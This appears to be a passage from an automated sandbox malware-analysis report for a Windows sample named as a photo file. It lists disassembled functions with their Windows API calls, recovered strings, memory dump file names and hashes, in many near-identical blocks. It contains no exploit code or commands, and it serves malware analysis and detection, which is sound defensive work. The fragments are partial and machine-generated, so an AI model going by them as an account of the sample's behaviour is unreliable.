                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                      • API String ID: 1256254125-769500911
                                                                      • Opcode ID: 2e7fdf924907931147f43179503a22705b2b56824c0b902b9428b6bb7a194a62
                                                                      • Instruction ID: f7f7c4a660dc9cf0c5e902b6e90e57dbac86d36a05ce0528be80e3eeb54d8958
                                                                      • Opcode Fuzzy Hash: 2e7fdf924907931147f43179503a22705b2b56824c0b902b9428b6bb7a194a62
                                                                      • Instruction Fuzzy Hash: 17419A32A001279ACB105F7D88916BE77A5BF61774B28812BE569DB284FB35CD81C7B0
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00D852BE
                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00D85334
                                                                      • GetLastError.KERNEL32 ref: 00D8533E
                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00D853C5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                      • API String ID: 4194297153-14809454
                                                                      • Opcode ID: 6501d52dd2ea985c61d2b9beb0f5dd63e8beb34a38ee0e6469e285d4a752980e
                                                                      • Instruction ID: b0b1d11e7a075b758d44c98b3e6054e26e0a7bca70f9d7962acb18fd41cb9059
                                                                      • Opcode Fuzzy Hash: 6501d52dd2ea985c61d2b9beb0f5dd63e8beb34a38ee0e6469e285d4a752980e
                                                                      • Instruction Fuzzy Hash: 60317035A006059FCB10EF68E884AADBBB5EF05354F18806AE405DB356DBB1DD45CBF0
                                                                      APIs
                                                                      • CreateMenu.USER32 ref: 00DA3BAC
                                                                      • SetMenu.USER32(?,00000000), ref: 00DA3BBB
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DA3C43
                                                                      • IsMenu.USER32(?), ref: 00DA3C57
                                                                      • CreatePopupMenu.USER32 ref: 00DA3C61
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DA3C8E
                                                                      • DrawMenuBar.USER32 ref: 00DA3C96
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                      • String ID: 0$F
                                                                      • API String ID: 161812096-3044882817
                                                                      • Opcode ID: cec2de98833204cf03f9bac5fe26c3fd0c054c9281c26036fb3dbdd5c120a8d4
                                                                      • Instruction ID: 70c73b49bbef330b581f684cb252c37e30ec4b0d432eb3bfaa7a9b8fdc0d09db
                                                                      • Opcode Fuzzy Hash: cec2de98833204cf03f9bac5fe26c3fd0c054c9281c26036fb3dbdd5c120a8d4
                                                                      • Instruction Fuzzy Hash: 564127B9A11309AFDB14DF64DC94EAA7BB6FF4A360F180429F955A7350D730AA10CF60
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DA39D0
                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DA39D3
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA39FA
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DA3A1D
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DA3A95
                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00DA3ADF
                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00DA3AFA
                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00DA3B15
                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00DA3B29
                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00DA3B46
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$LongWindow
                                                                      • String ID:
                                                                      • API String ID: 312131281-0
                                                                      • Opcode ID: 0d8cc41973eb4f61e6b006262df7ac4a44b73c75835b3d018ef373807a926bff
                                                                      • Instruction ID: d6b54ab34c8b9749ef99c5af1facf19ea54a693489008af5924ffe6f9b1e251a
                                                                      • Opcode Fuzzy Hash: 0d8cc41973eb4f61e6b006262df7ac4a44b73c75835b3d018ef373807a926bff
                                                                      • Instruction Fuzzy Hash: 68616A75A00258AFDB10DFA8CC81EEE77B9EF0A710F140159FA15EB2A1C770AA45CB60
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00D7B06F
                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00D7A0FF,?,00000001), ref: 00D7B083
                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00D7B08A
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D7A0FF,?,00000001), ref: 00D7B099
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D7B0AB
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D7A0FF,?,00000001), ref: 00D7B0C4
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D7A0FF,?,00000001), ref: 00D7B0D6
                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00D7A0FF,?,00000001), ref: 00D7B11B
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00D7A0FF,?,00000001), ref: 00D7B130
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00D7A0FF,?,00000001), ref: 00D7B13B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                      • String ID:
                                                                      • API String ID: 2156557900-0
                                                                      • Opcode ID: 415cac41af98f77825187d9f23eaa631570e940bc477c9bc4ecdeaf0d4e8feea
                                                                      • Instruction ID: 9aef34fb1f6f389750a11a2839905341da0bc0569dcdc4e0b897ac7b97a41444
                                                                      • Opcode Fuzzy Hash: 415cac41af98f77825187d9f23eaa631570e940bc477c9bc4ecdeaf0d4e8feea
                                                                      • Instruction Fuzzy Hash: 2F318E71610705ABEB24EF25DCD8B7A77BDAF46361F58800AF905DB2A0E7B49D408B70
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00D42C24
                                                                        • Part of subcall function 00D42958: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4D771,00000000,00000000,00000000,00000000,?,00D4D798,00000000,00000007,00000000,?,00D4DB95,00000000), ref: 00D4296E
                                                                        • Part of subcall function 00D42958: GetLastError.KERNEL32(00000000,?,00D4D771,00000000,00000000,00000000,00000000,?,00D4D798,00000000,00000007,00000000,?,00D4DB95,00000000,00000000), ref: 00D42980
                                                                      • _free.LIBCMT ref: 00D42C30
                                                                      • _free.LIBCMT ref: 00D42C3B
                                                                      • _free.LIBCMT ref: 00D42C46
                                                                      • _free.LIBCMT ref: 00D42C51
                                                                      • _free.LIBCMT ref: 00D42C5C
                                                                      • _free.LIBCMT ref: 00D42C67
                                                                      • _free.LIBCMT ref: 00D42C72
                                                                      • _free.LIBCMT ref: 00D42C7D
                                                                      • _free.LIBCMT ref: 00D42C8B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: b575bd5cc798d545f69264b542d5c9b2041c93cd5c4d07d6a571a7daedc10abc
                                                                      • Instruction ID: 1360ca3ba729ec81887cbdb779427690fa12b35ff35a18f54f45af121ef7009b
                                                                      • Opcode Fuzzy Hash: b575bd5cc798d545f69264b542d5c9b2041c93cd5c4d07d6a571a7daedc10abc
                                                                      • Instruction Fuzzy Hash: B511D476240149BFCB01EF54C852CED3BA5FF05350F9144A0BA589B222DA31DAD19FB0
                                                                      APIs
                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D12D64
                                                                      • OleUninitialize.OLE32(?,00000000), ref: 00D12E03
                                                                      • UnregisterHotKey.USER32(?), ref: 00D12FE8
                                                                      • DestroyWindow.USER32(?), ref: 00D53045
                                                                      • FreeLibrary.KERNEL32(?), ref: 00D530AA
                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D530D7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                      • String ID: close all
                                                                      • API String ID: 469580280-3243417748
                                                                      • Opcode ID: beaf2d241eb3874cf4717eeebfae3b8ef615402a06eb12a7c3cfb1fb884702ee
                                                                      • Instruction ID: 477fea7864cb3e6e77d9bbefb5e31701a04d9ecb594823e9e3516b0a4e0763e6
                                                                      • Opcode Fuzzy Hash: beaf2d241eb3874cf4717eeebfae3b8ef615402a06eb12a7c3cfb1fb884702ee
                                                                      • Instruction Fuzzy Hash: 16D17831301212AFCB29EF25D495A69F7A0FF05751F1441ADE84AAB251CF31AE66CFB0
                                                                      APIs
                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D87ECB
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D87EDF
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00D87F09
                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00D87F23
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D87F35
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D87F7E
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00D87FCE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                      • String ID: *.*
                                                                      • API String ID: 769691225-438819550
                                                                      • Opcode ID: c8a6546ecd015a3727443ec18bd7914401be474c9a6cf2e0691fd95d4b707bea
                                                                      • Instruction ID: ffc11ad2f25ce37f61585de414d695fa7bd471585c66b49e947c40823b0c7a9b
                                                                      • Opcode Fuzzy Hash: c8a6546ecd015a3727443ec18bd7914401be474c9a6cf2e0691fd95d4b707bea
                                                                      • Instruction Fuzzy Hash: 03817D725083419BCB21EF15C484ABAB3E9FF85310F68486AF989C7250EB35DD45CBB2
                                                                      APIs
                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00D1761A
                                                                        • Part of subcall function 00D176AA: GetClientRect.USER32(?,?), ref: 00D176D0
                                                                        • Part of subcall function 00D176AA: GetWindowRect.USER32(?,?), ref: 00D17711
                                                                        • Part of subcall function 00D176AA: ScreenToClient.USER32(?,?), ref: 00D17739
                                                                      • GetDC.USER32 ref: 00D552A2
                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D552B5
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00D552C3
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00D552D8
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00D552E0
                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D55371
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                      • String ID: U
                                                                      • API String ID: 4009187628-3372436214
                                                                      • Opcode ID: 2735b22e6dbb37e0c6ecebc3a6e59f387c9cb55ecefd2eaa8f159aa607116142
                                                                      • Instruction ID: 8ea33a2f9f158e8830cf876f5653bbf66a367d7eace24bcf9a183386afdebae0
                                                                      • Opcode Fuzzy Hash: 2735b22e6dbb37e0c6ecebc3a6e59f387c9cb55ecefd2eaa8f159aa607116142
                                                                      • Instruction Fuzzy Hash: DE71F330500604EFDF22CF64E894AEA7B71FF45362F180269ED595A26ACB31D884DF70
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                      • API String ID: 176396367-1994484594
                                                                      • Opcode ID: fa0985369af0312d3b8febd41b4bddf95fdca1b1a43196f5724c073507563fcf
                                                                      • Instruction ID: 9dd7d6d893db727f8dfc8987f47320631b7efc8277daadc4088b8357fb43ae7d
                                                                      • Opcode Fuzzy Hash: fa0985369af0312d3b8febd41b4bddf95fdca1b1a43196f5724c073507563fcf
                                                                      • Instruction Fuzzy Hash: 7E511532B003228BCB16CE69C98057A73E1FF95714B68852DE58D93644FB20DD49D7B1
                                                                      APIs
                                                                        • Part of subcall function 00D73F58: CharUpperBuffW.USER32(?,?,00000000,00DAD0D0,?,?,00000001,?,?,00D74286,?,?,?,?,00000000,00DAD0D0), ref: 00D73FE5
                                                                      • _wcslen.LIBCMT ref: 00D74296
                                                                      • _wcslen.LIBCMT ref: 00D742F0
                                                                      • _wcslen.LIBCMT ref: 00D74337
                                                                      • _wcslen.LIBCMT ref: 00D7437B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                      • API String ID: 1256254125-1994484594
                                                                      • Opcode ID: 8342dd9f68c60efd4038817199f96af2a7878629a1e64b78323033af9f6459d0
                                                                      • Instruction ID: 1f3c99e9c053181f81612df617fffe8728c31b14955523803b7e2c20b6f79528
                                                                      • Opcode Fuzzy Hash: 8342dd9f68c60efd4038817199f96af2a7878629a1e64b78323033af9f6459d0
                                                                      • Instruction Fuzzy Hash: C5412332B043129B8B16DE69D8C087B73E1FF95714B68862EE48D93644FB20DD49C7B1
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                      • API String ID: 176396367-1994484594
                                                                      • Opcode ID: 60b3ce3cb3b5e4fb0f85db674882d296758690981b0b2670bc8fdbc80529ed78
                                                                      • Instruction ID: a1ce79292bbf41c871576e44d9426d013a2d1eb7a2fe6e924fcd3e1a59fc6796
                                                                      • Opcode Fuzzy Hash: 60b3ce3cb3b5e4fb0f85db674882d296758690981b0b2670bc8fdbc80529ed78
                                                                      • Instruction Fuzzy Hash: CC411432B107228BCB26CE69C9C057B7391FF95714B68862DE48E97684FB20DD09D7B0
                                                                      APIs
                                                                        • Part of subcall function 00D13536: _wcslen.LIBCMT ref: 00D13541
                                                                        • Part of subcall function 00D73F58: CharUpperBuffW.USER32(?,?,00000000,00DAD0D0,?,?,00000001,?,?,00D74286,?,?,?,?,00000000,00DAD0D0), ref: 00D73FE5
                                                                      • _wcslen.LIBCMT ref: 00D74296
                                                                      • _wcslen.LIBCMT ref: 00D742F0
                                                                      • _wcslen.LIBCMT ref: 00D74337
                                                                      • _wcslen.LIBCMT ref: 00D7437B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                      • API String ID: 1256254125-1994484594
                                                                      • Opcode ID: 4a9db91d1983d999684a85593945b347cabf05523bfadf25120f6acc7e8ea417
                                                                      • Instruction ID: ceee32bd46ced6c26980dd69b4ccab9455b7d4dbd69e4dc3ad4e347d8d75b6d9
                                                                      • Opcode Fuzzy Hash: 4a9db91d1983d999684a85593945b347cabf05523bfadf25120f6acc7e8ea417
                                                                      • Instruction Fuzzy Hash: 7E413432B143128B8B16DE69D48047B73E1FF95724BA8822EF88D93644FB20DD49C7B1
                                                                      APIs
                                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00D83502
                                                                        • Part of subcall function 00D1B606: _wcslen.LIBCMT ref: 00D1B610
                                                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 00D83528
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: LoadString$_wcslen
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 4099089115-2391861430
                                                                      • Opcode ID: 4017a37f1a4f657cc1d96f77101ed17da2ec1faa8f3f5437c60325bc78fd7810
                                                                      • Instruction ID: 51a7a2495fe598ca59af8c738f2105b13a0d828cbb8052244fd89bb58d47824f
                                                                      • Opcode Fuzzy Hash: 4017a37f1a4f657cc1d96f77101ed17da2ec1faa8f3f5437c60325bc78fd7810
                                                                      • Instruction Fuzzy Hash: D5513A32900219BACF14EBE4EC92EEEBB35EF14710F044166F515721A1EF705A99DBB1
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                      • API String ID: 176396367-1994484594
                                                                      • Opcode ID: 7afc8cb3673fa84afcba9c0c82d8fbb3dc958fa94b409648262893633fc14e9a
                                                                      • Instruction ID: 4345c050ee8b73869fa6093bfde48b1e1d9dc79e1466659ed1731167a780bfe0
